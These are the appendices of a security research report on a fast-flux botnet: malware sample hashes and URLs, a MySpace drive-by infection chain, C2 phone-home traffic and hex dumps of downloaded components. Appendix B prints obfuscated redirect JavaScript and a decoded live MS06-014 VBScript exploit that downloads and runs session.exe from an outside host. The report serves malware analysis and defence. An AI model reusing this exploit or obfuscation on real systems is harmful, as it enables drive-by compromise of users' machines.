APPENDICES

Appendices:

APPENDIX A: Fast-Flux Proxy Samples

There have been noticeable advancements the flux agent presented in this document over the past year, including the migration away from arbitrary TCP connections to obtain clear text instructions, using an HTTP library to obtain downloaded instructions, settings and binary updates, and finally the most recent variants that receive control settings via encoded update files. The following examples demonstrates a short historical timeline of just one fast-flux service network malware variant responsible for all double-flux service networks referenced in this research. It is worth noting that we have observed evidence supporting five distinct fast-flux service nets in operation on the Internet but have not acquired malware samples for all variants to support in depth study.

Sample: 5cbef2780c8b59977ae598775bad8ecb-weby.exe
File type(s): MS-DOS executable (EXE), OS/2 or MS Windows
Size: 51200 Bytes
Access: 2007-04-02 22:34:03.000000000 -0400
Modify: 2007-04-02 22:30:36.000000000 -0400
Change: 2007-04-02 22:34:03.000000000 -0400

MD5: 5cbef2780c8b59977ae598775bad8ecb
SHA1: 0925a54ba0366a6406d3222e65b03df0ea8cbc11

Source(s) of sample: (Timestamps are YYYY-MM-DD hh:mm:ss EDT -0400)
[2007-04-02 22:32:27] 5cbef2780c8b59977ae598775bad8ecb - http://xxx.myexes.hk/exes/weby.exe

Sample: 70978572bc5c4fecb9d759611b27a762-weby.exe
File type(s): MS-DOS executable (EXE), OS/2 or MS Windows
Size: 50176 Bytes
Access: 2007-03-15 02:09:03.000000000 -0400
Modify: 2007-03-09 10:51:26.000000000 -0500
Change: 2007-03-15 02:09:03.000000000 -0400

MD5: 70978572bc5c4fecb9d759611b27a762
SHA1: f8a4d881257dc2f2b2c17ee43f60144e6615994d

Source(s) of sample: (Timestamps are YYYY-MM-DD hh:mm:ss EDT -0400)
[2007-03-15 02:06:43] 70978572bc5c4fecb9d759611b27a762 â“http://xxx.myexes.hk/exes/webdlx/weby.exe

Sample: 5870fd7119a91323dbdf04ebd07d0ac7-plugin_ddos.dll
File type(s): MS-DOS executable (EXE), OS/2 or MS Windows
Size: 9728 Bytes
Access: 2007-04-02 15:39:05.000000000 -0400
Modify: 2007-03-09 23:48:17.000000000 -0500
Change: 2007-04-02 15:39:06.000000000 -0400

MD5: 5870fd7119a91323dbdf04ebd07d0ac7
SHA1: 4c4d1b3e2030e9a8f3b5c8f152ef9ac7590a96ca

Source(s) of sample: (Timestamps are YYYY-MM-DD hh:mm:ss EDT -0400)
[2007-04-02 15:36:55] 5870fd7119a91323dbdf04ebd07d0ac7 ⓠhttp://65.111.176.xxx/weby/plugin_ddos.dll

Previous incarnation:

Sample: e903534fab14ee7e00c279d64f578cbb-webyx.exe
File type(s): MS-DOS executable (EXE)
Size: 29557 Bytes
Access: 2007-02-06 15:26:03.000000000 -0500
Modify: 2007-02-02 08:47:24.000000000 -0500
Change: 2007-02-06 15:26:03.000000000 -0500

MD5: e903534fab14ee7e00c279d64f578cbb
SHA1: cf8279c35ec7d8914f3a4ccaaa71e14e7a925b93

Source(s) of sample: (Timestamps are YYYY-MM-DD hh:mm:ss EST -0500)
[2007-02-06 15:20:55] e903534fab14ee7e00c279d64f578cbb - http://xxx.myfiles.hk/exes/webyx.exe

Even older sample:

Sample: 88b58b62ae43f0fa42e852874aefbd01-weby.exe
File type(s): MS-DOS executable (EXE)
Size: 29425 Bytes
Access: 2007-01-20 16:29:06.000000000 -0500
Modify: 2007-01-20 05:39:22.000000000 -0500
Change: 2007-01-20 16:29:06.000000000 -0500

MD5: 88b58b62ae43f0fa42e852874aefbd01
SHA1: 6a22e1a06ced848da220301ab85be7a33867bfb5

Source(s) of sample: (Timestamps are YYYY-MM-DD hh:mm:ss EST -0500)
[2007-01-20 16:26:12] 88b58b62ae43f0fa42e852874aefbd01 - http://xxx.myexes.hk/exes/weby.exe

A prehistoric sample of flux-agent code (according to Internet time). We first observed
nodes infected with this malware in the middle of 2006, but only acquired a malware sample
for analysis in November 2006:

Sample: d134894005c299c1c01e63d9012a12c6-CD373B130D74F24CA5F8F1ADECA0F6856BC6072A-dnssvc.exe
File type(s): MS-DOS executable (EXE), OS/2 or MS Windows
Size: 11264 Bytes
Access: 2006-11-14 06:39:03.000000000 -0500
Modify: 2006-11-14 06:29:14.000000000 -0500
Change: 2006-11-14 06:39:03.000000000 -0500

MD5: d134894005c299c1c01e63d9012a12c6
SHA1: cd373b130d74f24ca5f8f1adeca0f6856bc6072a
Source(s) of sample: (Timestamps are YYYY-MM-DD hh:mm:ss EST -0500)
[2006-11-14 06:29:44] d134894005c299c1c01e63d9012a12c6 - CD373B130D74F24CA5F8F1ADE

APPENDIX B: The Infection Process

Now that you have a better understanding of fast-flux technique, the different types, and the malware involved, let's see how the malware distribution process works. This is a real world example of a MySpace drive-by/phish attack vectors propagating Fast Flux network growth. In this example we identify two infection vectors:

1. Compromised MySpace Member profiles redirecting to drive-by/phish

2. SWF Flash image malicious redirection to drive-by/phish

We start with profile redirection in MySpace member profiles using iframes. Notice in this example just how many times iframes are called, often simply redirecting to another iframe. Also note the heavy use of obfuscated JavaScript. The attack begins when a connection is made to the domain http://xxx.e4447aa2.com.

$ GET http://www.e447aa2.com
<HTML>
<HEAD>

<meta http-equiv="refresh" content="1;url="http://xxx.myspace.cfm.fuseaction.splash.mytoken.
76701a26.da3e.44a3a17b.e447aa2.com/da3e/index.php"/>

</HEAD>
</HTML>

By following the above /da3e/index.php link, we end up going to a credible looking MySpace landing page (serviced in flux) with the most interesting footer element displayed below:

<!-- onRequestEnd -->
<script>window.status="Done"</script><iframe src="../.footer_01.gif" width=0 height=0></iframe>

The iframe rendered /.footer_01.gif , which is not an actual gif file, but instead an encoded/obfuscated JavaScript snippet. Below we can see the obfuscated JavaScript code it feeds us.

<SCRIPT Language="JavaScript">
eval(unescape("%66%75%6E%63%74%69%6F%6E%20%64%28%73%29%7B%72%3D%6E%65%77%20%41
%72%72%61%79%28%29%3B%74%3D%22%22%3B%6A%3D%30%3B%66%6F%72%28%69%3D%73%2E%6C%65
%6E%67%74%68%2D%31%3B%69%3E%30%3B%69%2D%2D%29%7B%74%2B%3D%53%74%72%69%6E%67%2E
%66%72%6F%6D%43%68%61%72%43%6F%64%65%28%73%2E%63%68%61%72%43%6F%64%65%41%74%28
%69%29%5E%32%29%3B%69%66%28%74%2E%6C%65%6E%67%74%68%3E%38%30%29%7B%72%5B%6A%2B
%2B%5D%3D%74%3B%74%3D%22%22%7D%7D%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28
%72%2E%6A%6F%69%6E%28%22%22%29%2B%74%29%7D")
);d(unescape("%08<vrkpaq-> glmF ?qwvcvq,umflku<vrkpaq>"));
</SCRIPT>
<SCRIPT Language="JavaScript">

eval(unescape("%66%75%6E%63%74%69%6F%6E%20%64%28%73%29%7B%72%3D%6E%65%77%20%41
%72%72%61%79%28%29%3B%74%3D%22%22%3B%6A%3D%30%3B%66%6F%72%28%69%3D%73%2E%6C%65
%6E%67%74%68%2D%31%3B%69%3E%30%3B%69%2D%2D%29%7B%74%2B%3D%53%74%72%69%6E%67%2E
%66%72%6F%6D%43%68%61%72%43%6F%64%65%28%73%2E%63%68%61%72%43%6F%64%65%41%74%28
%69%29%5E%32%29%3B%69%66%28%74%2E%6C%65%6E%67%74%68%3E%38%30%29%7B%72%5B%6A%2B
%2B%5D%3D%74%3B%74%3D%22%22%7D%7D%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28
%72%2E%6A%6F%69%6E%28%22%22%29%2B%74%29%7D")
);d(unescape("%08<gocpdk-><3?vjekgj\"3?jvfku\" dke,12]pgfcgj-oma,a6a6`dcd--8rvvj ?apq\"gocpdk>"));
</SCRIPT>

The decoded result of the above JavaScript is seen below, which is nothing more then another iframe redirecting with a connection to another site.

<script>window.status="Done"</script>

<iframe src="http://xxx.fafb4c4c.com/header_03.gif"></iframe>

The Iframe rendered /header_03.gif (served in flux) results in another JavaScript encoded/obfuscated file for which the decoded result of the above /header_03.gif is:

<script>window.status="Done"</script>

<iframe src="http://xxx.fafb4c4c.com/routine.php" width=1 height=1></iframe>

Following the iframe rendered /routine.php file results in another JavaScript encoded/obfuscated file. The decoded result of /routine.php is an attempt to exploit vulnerable IE client browsers using the Internet Explorer (MDAC) Remote Code Execution Exploit (MS06-014) for which Microsoft released a patch in May 2006. Below is the decode of the actual attack. Be Careful, This is Live Exploit Code.

<script type="text/javascript">
function handleError() {
return true;
}
window.onerror = handleError;
</script>
<script>window.status="Done"</script>
<SCRIPT language="VBScript">

If navigator.appName="Microsoft Internet Explorer" Then
If InStr(navigator.platform,"Win32") <> 0 Then
Dim Obj_Name
Dim Obj_Prog<
set obj_RDS = document.createElement("object")
obj_RDS.setAttribute "id", "obj_RDS"
obj_RDS.setAttribute "classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"
fn = "ntmusis32.exe"
Obj_Name = "Shell"
Obj_Prog = "Application"
set obj_ShellApp = obj_RDS.CreateObject(Obj_Name & "." & Obj_Prog,"")
Set oFolder = obj_ShellApp.NameSpace(20)
Set oFolderItem=oFolder.ParseName("Symbol.ttf")
Font_Path_Components=Split(oFolderItem.Path,"\",-1,1)
WinDir= Font_Path_Components(0) & "\" & Font_Path_Components(1) & "\"
fn=WinDir & fn
Obj_Name = "Microsoft"
Obj_Prog = "XMLHTTP"
set obj_msxml2 = CreateObject(Obj_Name & "." & Obj_Prog)
obj_msxml2.open "GET","http://xxx.fafb4c4c.com/session.exe",False
obj_msxml2.send
On Error Resume Next
Obj_Name = "ADODB"
Obj_Prog = "Stream"
set obj_adodb = obj_RDS.CreateObject(Obj_Name & "." & Obj_Prog,"")
If Err.Number Then
Obj_Name = "Scripting"
Obj_Prog = "FileSystemObject"
Set obj_FileSys=obj_RDS.CreateObject(Obj_Name & "." & Obj_Prog,"")
Set download_file=obj_FileSys.CreateTextFile(fn, TRUE)
download_file_size=LenB(XMLBody)
For i=1
To download_file_size
cByte=MidB(XMLBody,i,1)
ByteCode=AscB(cByte)
download_file.Write(Chr(ByteCode))
Next
download_file.Close
Obj_Name = "WScript"
Obj_Prog = "Shell"
Set obj_WShell=obj_RDS.CreateObject(Obj_Name & "." & Obj_Prog,"")
On Error Resume Next
obj_WShell.Run fn,1,FALSE
Else
obj_adodb.Type=1
obj_adodb.Open
obj_adodb.Write(obj_msxml2.responseBody)
obj_adodb.SaveToFile fn,2
obj_ShellApp.ShellExecute fn
End If
End If
End If

</SCRIPT>

The successful compromise of a windows host via this exploit content results in the download of a malicious downloader stub executable session.exe that is then responsible for attempting to download additional malicious components necessary for integrate new compromised hosts into a fast flux service network. The malware sample session.exe above attempts to download and execute the following components:

http://xxx.myfiles.hk/exes/webdl3x/weby.exe
http://xxx.myfiles.hk/exes/webdl3x/oly.exe
http://xxx.camgenie.com/weby7.exe

Supporting Detail:

Following are a representative sampling of URLs to imageshack.us site hosted flash files that simply perform one simple action, an action-script based browser redirect to a flux-hosted combination phishing/drive by exploit that leverages the Internet Explorer (MDAC) Remote Code Execution Exploit (MS06-014). All files are exactly the same based on same md5 and sha1 hashes for all files:

MD5:6eaf6eed47fb52a6a87da8c829c7f8a0
SHA1: dc60b0fedf54eaf055c64ae6d434b8fc18252740

Imageshack HTTP Server maintained modification time suggest swf file compile time of 2007-06-05 03:56:30-0700. Decompiling the flash component results in:

$ swfdump -atp ./xxx.imageshack.us/img527/3530/38023350se6.swf

[HEADER] File version: 8
[HEADER] File size: 98
[HEADER] Frame rate: 120.000000
[HEADER] Frame count: 1
[HEADER] Movie width: 1.00
[HEADER] Movie height: 1.00
[045] 4 FILEATTRIBUTES
[009] 3 SETBACKGROUNDCOLOR (ff/ff/ff)
[018] 31 PROTECT
[00c] 28 DOACTION
( 24 bytes) action: GetUrl URL:"http://xxx.e447aa2.com" Label:""
( 0 bytes) action: End
[001] 0 SHOWFRAME 1 (00:00:00,000)
[000] 0 END

Below are a few examples of URLs that host the same flash files:

http://xxx.imageshack.us/img116/1299/97231039qx0.swf
http://xxx.imageshack.us/img116/1424/81562934sa1.swf
http://xxx.imageshack.us/img116/1699/63088115dg4.swf
http://xxx.imageshack.us/img116/1700/81458378cv3.swf
http://xxx.imageshack.us/img116/2453/70754097cm0.swf
http://xxx.imageshack.us/img116/2456/14892185hl4.swf
http://xxx.imageshack.us/img116/8345/26333607xo4.swf
http://xxx.imageshack.us/img120/3595/53060403mw7.swf

The following are examples of flux serviced MySpace phish/drive-by domains referenced from presumably compromised MySpace user accounts, which were observed during the same time period between 2007-06-26 17:35:44 and 23:18:00 (EDT -0400)

xxx.myspace.com.index.cfm.fuseaction.user.mytoken.00b24yqc.ac8a562.com
xxx.myspace.com.index.cfm.fuseaction.user.mytoken.0c38outb.h5v17lt.com
xxx.myspace.com.index.cfm.fuseaction.user.mytoken.0en0r8xd.115534a.com
xxx.myspace.com.index.cfm.fuseaction.user.mytoken.0l3ttn77.oqrhldv.com
xxx.myspace.com.index.cfm.fuseaction.user.mytoken.0w4c4w74.jk33v96.com
xxx.myspace.com.index.cfm.fuseaction.user.mytoken.3kuto9a4.de082ak.com
xxx.myspace.com.index.cfm.fuseaction.user.mytoken.5c1wkjil.kirjmbr.com

APPENDIX C: Fast-Flux Proxy Samples

In our fast-flux case study, this is where our infected flux agent makes an initial contact (phone home) connection to a remote web server to report to the attacker that the victim system has been successfully infected and is standing by to provide flux-net services.

GET /settings/weby/remote.php?os=XP&user=homenet-ab0148a&status=1&version=2.0&build=beta004&uptime=244813135872w%20244813135872d%20244813135892h%20244813135919m%20244813135929s HTTP/1.1
User-Agent: MSIE 7.0
Host: xxx.ifeelyou.info
Cache-Control: no-cache

GET /settings/weby/remote.php?os=XP&user=homenet-ab0148a&status=1&version=2.0&build=beta004&uptime=244813135872w%20244813135872d%20244813135892h%20244813135919m%20244813135929s HTTP/1.1
User-Agent: MSIE 7.0
Host: xxx.ifeelyou.info
Cache-Control: no-cache

GET /settings/weby/remote.php?os=XP&user=homenet-ab0148a&status=1&version=2.0&build=beta004&uptime=244813135872w%20244813135872d%20244813135892h%20244813135919m%20244813135929s HTTP/1.1
User-Agent: MSIE 7.0
Host: xxx.ifeelyou.info
Cache-Control: no-cache

HTTP/1.1 200 OK
Date: Tue, 03 Apr 2007 07:55:53 GMT
Server: Apache/2.0.54 (Fedora)
X-Powered-By: PHP/5.0.4
Content-Length: 19
Connection: close
Content-Type: text/html; charset=UTF-8

Added Successfully!

APPENDIX D: Fast-Flux Proxy Samples

In our fast-flux case study, this is the server response to a request from the fast-flux agent for the configuration file settings.ini on the remote web server. This appears to be a consistent 197 byte binary/encoded configuration response. We are still attempting to complete reverse engineering of this session:

00000000  4745 5420 2f73 6574 7469 6e67 732f 7765  GET /settings/we
00000010  6279 2f73 6574 7469 6e67 732e 696e 6920  by/settings.ini
00000020  4854 5450 2f31 2e31 0d0a 5573 6572 2d41  HTTP/1.1..User-A
00000030  6765 6e74 3a20 4d53 4945 2037 2e30 0d0a  gent: MSIE 7.0..
00000040  486f 7374 3a20 xxxx xxxx xxxx xxxx 2e69  Host: xxxxxxxx.i
00000050  636f 6e6e 6563 7479 6f75 2e62 697a 0d0a  connectyou.biz..
00000060  4361 6368 652d 436f 6e74 726f 6c3a 206e  Cache-Control: n
00000070  6f2d 6361 6368 650d 0a0d 0a47 4554 202f  o-cache....GET /
00000080  7365 7474 696e 6773 2f77 6562 792f 7365  settings/weby/se
00000090  7474 696e 6773 2e69 6e69 2048 5454 502f  ttings.ini HTTP/
000000a0  312e 310d 0a55 7365 722d 4167 656e 743a  1.1..User-Agent:
000000b0  204d 5349 4520 372e 300d 0a48 6f73 743a   MSIE 7.0..Host:
000000c0  20xx xxxx xxxx xxxx xx2e 6963 6f6e 6e65   xxxxxxxx.iconne
000000d0  6374 796f 752e 6269 7a0d 0a43 6163 6865  ctyou.biz..Cache
000000e0  2d43 6f6e 7472 6f6c 3a20 6e6f 2d63 6163  -Control: no-cac
000000f0  6865 0d0a 0d0a 4854 5450 2f31 2e31 2032  he....HTTP/1.1 2
00000100  3030 204f 4b0d 0a44 6174 653a 2054 7565  00 OK..Date: Tue
00000110  2c20 3033 2041 7072 2032 3030 3720 3037  , 03 Apr 2007 07
00000120  3a35 353a 3430 2047 4d54 0d0a 5365 7276  :55:40 GMT..Serv
00000130  6572 3a20 4170 6163 6865 2f32 2e30 2e35  er: Apache/2.0.5
00000140  3420 2846 6564 6f72 6129 0d0a 4c61 7374  4 (Fedora)..Last
00000150  2d4d 6f64 6966 6965 643a 204d 6f6e 2c20  -Modified: Mon,
00000160  3032 2041 7072 2032 3030 3720 3233 3a33  02 Apr 2007 23:3
00000170  373a 3336 2047 4d54 0d0a 4554 6167 3a20  7:36 GMT..ETag:
00000180  2238 3030 3761 2d63 352d 6234 6263 3730  "8007a-c5-b4bc70
00000190  3030 220d 0a41 6363 6570 742d 5261 6e67  00"..Accept-Rang
000001a0  6573 3a20 6279 7465 730d 0a43 6f6e 7465  es: bytes..Conte
000001b0  6e74 2d4c 656e 6774 683a 2031 3937 0d0a  nt-Length: 197..
000001c0  436f 6e6e 6563 7469 6f6e 3a20 636c 6f73  Connection: clos
000001d0  650d 0a43 6f6e 7465 6e74 2d54 7970 653a  e..Content-Type:
000001e0  2074 6578 742f 706c 6169 6e3b 2063 6861   text/plain; cha
000001f0  7273 6574 3d55 5446 2d38 0d0a 0d0a b2b4  rset=UTF-8......
00000200  0d0a 0d0a 8d8d 869a 958d 8595 819d 9d99  ................
00000210  d3c6 c6df dcc7 d8d8 d8c7 d8de dfc7 d8de  ................
00000220  ddc6 9e8c 8b90 c699 859c 8e80 87b6 8d8d  ................
00000230  869a c78d 8585 0d0a 0d0a 8d8d 869a 959d  ................
00000240  8a99 9588 848c 9b80 8a88 878d 9f8d c79d  ................
00000250  9f95 d1d9 95d8 d9d9 d9d9 0d0a 8d8d 869a  ................
00000260  959c 8d99 9588 848c 9b80 8a88 878d 9f8d  ................
00000270  c79d 9f95 d1d9 95d8 d9d9 d9d9 0d0a 8d8d  ................
00000280  869a 959d 9b86 8585 9588 848c 9b80 8a88  ................
00000290  878d 9f8d c79d 9f95 d1d9 95d8 d9d9 d9d9  ................
000002a0  0d0a 8d8d 869a 9581 9d9d 9995 8884 8c9b  ................
000002b0  808a 8887 8d9f 8dc7 9d9f 95d1 d995 d8d9  ................
000002c0  d9d9 d9                                  ...

APPENDIX E: Fast-Flux Proxy Samples

In our fast-flux case study, the system downloads a suspiciously named DLL plugin_ddos.dll, whose naming might suggest to some that it is a denial of service component.

00000000  4745 5420 2f77 6562 792f 706c 7567 696e  GET /weby/plugin
00000010  5f64 646f 732e 646c 6c20 4854 5450 2f31  _ddos.dll HTTP/1
00000020  2e31 0d0a 5573 6572 2d41 6765 6e74 3a20  .1..User-Agent:
00000030  4d53 4945 2037 2e30 0d0a 486f 7374 3a20  MSIE 7.0..Host:
00000040  3635 2e31 3131 2e31 3736 xxxx xxxx 0d0a  65.111.176.xxx..
00000050  4361 6368 652d 436f 6e74 726f 6c3a 206e  Cache-Control: n
00000060  6f2d 6361 6368 650d 0a0d 0a47 4554 202f  o-cache....GET /
00000070  7765 6279 2f70 6c75 6769 6e5f 6464 6f73  weby/plugin_ddos
00000080  2e64 6c6c 2048 5454 502f 312e 310d 0a55  .dll HTTP/1.1..U
00000090  7365 722d 4167 656e 743a 204d 5349 4520  ser-Agent: MSIE
000000a0  372e 300d 0a48 6f73 743a 2036 352e 3131  7.0..Host: 65.11
000000b0  312e 3137 362e xxxx xx0d 0a43 6163 6865  1.176.xxx..Cache
000000c0  2d43 6f6e 7472 6f6c 3a20 6e6f 2d63 6163  -Control: no-cac
000000d0  6865 0d0a 0d0a 4745 5420 2f77 6562 792f  he....GET /weby/
000000e0  706c 7567 696e 5f64 646f 732e 646c 6c20  plugin_ddos.dll
000000f0  4854 5450 2f31 2e31 0d0a 5573 6572 2d41  HTTP/1.1..User-A
00000100  6765 6e74 3a20 4d53 4945 2037 2e30 0d0a  gent: MSIE 7.0..
00000110  486f 7374 3a20 3635 2e31 3131 2e31 3736  Host: 65.111.176
00000120  2exx xxxx 0d0a 4361 6368 652d 436f 6e74  .xxx..Cache-Cont
00000130  726f 6c3a 206e 6f2d 6361 6368 650d 0a0d  rol: no-cache...
00000140  0a48 5454 502f 312e 3120 3230 3020 4f4b  .HTTP/1.1 200 OK
00000150  0d0a 4461 7465 3a20 5475 652c 2030 3320  ..Date: Tue, 03
00000160  4170 7220 3230 3037 2030 373a 3536 3a30  Apr 2007 07:56:0
00000170  3320 474d 540d 0a53 6572 7665 723a 2041  3 GMT..Server: A
00000180  7061 6368 652f 322e 302e 3534 2028 4665  pache/2.0.54 (Fe
00000190  646f 7261 290d 0a4c 6173 742d 4d6f 6469  dora)..Last-Modi
000001a0  6669 6564 3a20 5361 742c 2031 3020 4d61  fied: Sat, 10 Ma
000001b0  7220 3230 3037 2030 343a 3438 3a31 3720  r 2007 04:48:17
000001c0  474d 540d 0a45 5461 673a 2022 3830 3031  GMT..ETag: "8001
000001d0  312d 3236 3030 2d33 6661 3238 3634 3022  1-2600-3fa28640"
000001e0  0d0a 4163 6365 7074 2d52 616e 6765 733a  ..Accept-Ranges:
000001f0  2062 7974 6573 0d0a 436f 6e74 656e 742d   bytes..Content-
00000200  4c65 6e67 7468 3a20 3937 3238 0d0a 436f  Length: 9728..Co
00000210  6e6e 6563 7469 6f6e 3a20 636c 6f73 650d  nnection: close.
00000220  0a43 6f6e 7465 6e74 2d54 7970 653a 2061  .Content-Type: a
00000230  7070 6c69 6361 7469 6f6e 2f6f 6374 6574  pplication/octet
00000240  2d73 7472 6561 6d0d 0a0d 0a4d 5a50 0002  -stream....MZP..
00000250  0000 0004 000f 00ff ff00 00b8 0000 0000  ................
.
.
00000f80  0000 0050 6f72 7469 6f6e 7320 436f 7079  ...Portions Copy
00000f90  7269 6768 7420 2863 2920 3139 3939 2c32  right (c) 1999,2
00000fa0  3030 3320 4176 656e 6765 7220 6279 204e  003 Avenger by N
00000fb0  6854 0050 6a40 e8b8 f6ff ffc3 8d40 00b8  hT.Pj@.......@..
.
.
00002260  0000 0001 0000 0028 6000 002c 6000 0030  .......(`..,`..0
00002270  6000 00d4 2200 0042 6000 0000 0070 6c75  `..."..B`....plu
00002280  6769 6e5f 6464 6f73 2e64 6c6c 0056 616c  gin_ddos.dll.Val
00002290  6964 6174 6500 0000 0000 0000 0000 0000  idate...........
.
.
00002700  8237 b8f3 2442 0317 9b3a 8301 0000 8c00  .7..$B...:......
00002710  0000 0009 0000 0001 d070 6c75 6769 6e5f  .........plugin_
00002720  6464 6f73 001c a957 696e 536f 636b 0000  ddos...WinSock..
00002730  c753 7973 7465 6d00 0081 5379 7349 6e69  .System...SysIni
00002740  7400 0c4b 5769 6e64 6f77 7300 1055 5479  t..KWindows..UTy
00002750  7065 7300 0063 7368 6472 000c 3f57 696e  pes..cshdr..?Win
00002760  496e 6574 0000 7957 696e 536f 636b 3200  Inet..yWinSock2.
00002770  0000 0000 0000 0000 0000 0000 0000 0000  ................
00002780  0000 0000 0000 0000 0000 0000 0000 0000  ................
00002790  0000 0000 0000 0000 0000 0000 0000 0000  ................
000027a0  0000 0000 0000 0000 0000 0000 0000 0000  ................
000027b0  0000 0000 0000 0000 0000 0000 0000 0000  ................
000027c0  0000 0000 0000 0000 0000 0000 0000 0000  ................
000027d0  0000 0000 0000 0000 0000 0000 0000 0000  ................
000027e0  0000 0000 0000 0000 0000 0000 0000 0000  ................
000027f0  0000 0000 0000 0000 0000 0000 0000 0000  ................
00002800  0000 0000 0000 0000 0000 0000 0000 0000  ................
00002810  0000 0000 0000 0000 0000 0000 0000 0000  ................
00002820  0000 0000 0000 0000 0000 0000 0000 0000  ................
00002830  0000 0000 0000 0000 0000 0000 0000 0000  ................
00002840  0000 0000 0000 0000 0000 00              ...........